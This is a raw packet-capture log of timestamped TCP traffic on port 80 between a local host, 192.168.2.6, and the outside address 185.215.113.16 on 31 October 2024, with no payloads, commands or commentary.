                                                                            Oct 31, 2024 20:49:39.437542915 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.437571049 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.438344955 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.438361883 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.438534021 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.439265013 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.439289093 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.439310074 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.440200090 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.440220118 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.440243006 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.440881968 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.440911055 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.440967083 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.441659927 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.441682100 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.441699982 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.441731930 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.441731930 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.442384958 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.442404032 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.442454100 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.443089962 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.443108082 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.443145990 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.443835020 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.443854094 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.443883896 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.493376017 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.493518114 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.493536949 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.493563890 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.524703979 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.524792910 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.524889946 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.529844999 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.529892921 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.529954910 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.529982090 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.530020952 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.530683994 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.530880928 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.530919075 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.531126022 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.556219101 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.556246996 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.556273937 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.599443913 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.612360954 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.612529039 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.612548113 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.612582922 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.648401976 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.648456097 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.648487091 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.648798943 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.648817062 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.648902893 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.649199963 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.649216890 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.649264097 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.674952984 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.675017118 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.675087929 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.675106049 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.675148964 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.731065989 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.731179953 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.731251001 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.731259108 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.731617928 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.731682062 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.767416954 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.767560005 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.767579079 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.767642975 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.767970085 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.767987013 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.768049002 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.768481970 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.768580914 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.793884039 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.794070959 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.794085979 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.794183016 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.794445992 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.794512987 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.850184917 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.850286961 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.850301981 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.850374937 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.850749969 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.850769043 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.850797892 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.851511002 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.851552963 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.886063099 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.886082888 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.886146069 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.886493921 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.886579990 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.886619091 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.886850119 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.886863947 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.886878967 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.886900902 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.913352013 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.913403034 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.913424015 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.913439989 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.913471937 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.969985962 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.970109940 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.970129013 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.970208883 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:39.970613003 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.970628977 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:39.970655918 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.008239985 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.008304119 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.008317947 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.008346081 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.008388996 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.008904934 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.008922100 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.008969069 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.032280922 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.032444000 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.032460928 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.032524109 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.083868027 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.088830948 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.089648962 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.089664936 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.089757919 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.093991995 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.094012976 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.094028950 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.094135046 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.126663923 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.127300978 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.127327919 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.127382040 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.129015923 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.129034042 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.129070044 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.150763988 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.150834084 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.151144981 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.151161909 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.151218891 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.222177029 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.222196102 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.222578049 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.224195957 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.224214077 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.224256992 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.225404978 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.245491028 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.245686054 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.245728970 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.245745897 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.245788097 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.246588945 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.246615887 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.246668100 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.247992039 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.269440889 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.269535065 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.270100117 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.270132065 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.270495892 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.270549059 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.342941046 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.342962980 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.343031883 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.344301939 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.344326973 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.344376087 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.345788002 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.345803976 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.345818043 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.345834970 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.345851898 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.345881939 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.363924980 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.364262104 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.364278078 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.364320040 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.365128994 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.365147114 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.365196943 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.366328001 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.366379023 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.388432026 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.388644934 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.388670921 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.388704062 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.443212032 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.457767010 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.458863974 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.458880901 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.458911896 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.459956884 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.459971905 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.460020065 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.482683897 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.482731104 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.482953072 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.482966900 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.483010054 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.483571053 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.483587027 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.483618975 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.484544992 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.530200958 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.530261040 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.530427933 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.530447006 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.530519009 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.531481981 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.531497955 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.531826973 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.577331066 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.577352047 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.577398062 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.578248024 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.578264952 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.578282118 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.578306913 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.579154968 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.579216957 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.603946924 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.604584932 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.604602098 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.604618073 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.604638100 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.604660988 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.605312109 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.646356106 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.669040918 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.669362068 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.669378996 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.669426918 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.670562029 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.670648098 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.809195042 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.809307098 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.809323072 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.809356928 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.809606075 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.809631109 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.809667110 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.810004950 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.810019970 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.810034990 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.810062885 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.810080051 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.810611963 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.810626984 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.810642958 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.810657978 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.810669899 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.810699940 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.811054945 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.811069965 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.811084032 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.811120033 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.839710951 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.839798927 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.839823008 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.839855909 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.839893103 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.840112925 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.840127945 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.840167046 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.906405926 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.906533957 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.906569004 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.906658888 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.906928062 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.906944036 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.907006979 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.928292036 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.928355932 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.928451061 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.958188057 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.958270073 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.958285093 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.958455086 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.958511114 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.958992958 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.959079981 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.959095955 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:40.959142923 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:40.959166050 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.044596910 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.044727087 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.044744015 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.044795990 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.045200109 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.045214891 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.045231104 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.045248032 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.045253992 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.045277119 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.045850992 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.046643019 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.076977015 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.077088118 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.077104092 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.077155113 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.077332973 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.077385902 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.077402115 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.077418089 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.077423096 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.077445984 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.130717993 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.163378000 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.163475990 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.163491964 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.163558006 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.163866043 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.163882017 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.163923025 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.164201975 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.164218903 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.164254904 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.164546013 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.164608002 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:41.195494890 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:41.195557117 CET8049749185.215.113.16192.168.2.6
